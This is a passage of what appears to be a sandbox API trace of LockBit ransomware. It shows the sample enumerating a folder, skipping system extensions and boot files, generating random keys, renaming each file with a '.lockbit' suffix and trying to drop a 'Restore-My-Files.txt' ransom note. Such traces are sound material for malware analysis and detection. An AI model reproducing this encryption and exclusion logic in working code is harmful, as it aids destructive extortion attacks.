(pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF") returned=".WMF" [0120.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.575] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.576] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.576] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.lockbit") returned 72 [0120.576] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0120.577] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.577] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.577] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9596) returned 1 [0120.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.578] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.581] malloc (_Size=0xa6) returned 0x77d7a8 [0120.581] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.582] free (_Block=0x77d7a8) [0120.582] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086420.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4278, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086424.WMF", cAlternateFileName="")) returned 1 [0120.582] lstrcmpiW (lpString1=".", lpString2="J0086424.WMF") returned -1 [0120.582] lstrcmpiW (lpString1="..", lpString2="J0086424.WMF") returned -1 [0120.582] PathFindExtensionW (pszPath="J0086424.WMF") returned=".WMF" [0120.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.582] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.583] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086424.WMF") returned 1 [0120.584] lstrcmpiW (lpString1="ntldr", lpString2="J0086424.WMF") returned 1 [0120.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086424.WMF") returned 1 [0120.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086424.WMF") returned -1 [0120.584] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086424.WMF") returned -1 [0120.584] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086424.WMF") returned 1 [0120.584] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086424.WMF") returned -1 [0120.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned=".WMF" [0120.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.584] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.584] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.585] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.585] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.lockbit") returned 72 [0120.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0120.586] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.586] malloc (_Size=0x40068) returned 0x3e70008 [0120.586] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17016) returned 1 [0120.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0120.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0120.587] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.591] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.591] malloc (_Size=0xa6) returned 0x77d7a8 [0120.591] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.591] free (_Block=0x77d7a8) [0120.591] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.591] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.591] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5516, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086426.WMF", cAlternateFileName="")) returned 1 [0120.591] lstrcmpiW (lpString1=".", lpString2="J0086426.WMF") returned -1 [0120.592] lstrcmpiW (lpString1="..", lpString2="J0086426.WMF") returned -1 [0120.592] PathFindExtensionW (pszPath="J0086426.WMF") returned=".WMF" [0120.592] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.592] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.593] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.593] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086426.WMF") returned 1 [0120.593] lstrcmpiW (lpString1="ntldr", lpString2="J0086426.WMF") returned 1 [0120.593] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086426.WMF") returned 1 [0120.593] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086426.WMF") returned -1 [0120.594] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086426.WMF") returned -1 [0120.594] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086426.WMF") returned 1 [0120.594] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086426.WMF") returned -1 [0120.594] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.594] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned=".WMF" [0120.594] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.594] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.594] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.595] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.595] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.lockbit") returned 72 [0120.595] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0120.595] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.595] malloc (_Size=0x40068) returned 0x3ef0008 [0120.595] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=21782) returned 1 [0120.595] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0120.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0120.596] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.601] malloc (_Size=0xa6) returned 0x77d7a8 [0120.601] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.601] free (_Block=0x77d7a8) [0120.601] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.601] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.602] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8a12, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086428.WMF", cAlternateFileName="")) returned 1 [0120.602] lstrcmpiW (lpString1=".", lpString2="J0086428.WMF") returned -1 [0120.602] lstrcmpiW (lpString1="..", lpString2="J0086428.WMF") returned -1 [0120.602] PathFindExtensionW (pszPath="J0086428.WMF") returned=".WMF" [0120.602] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW 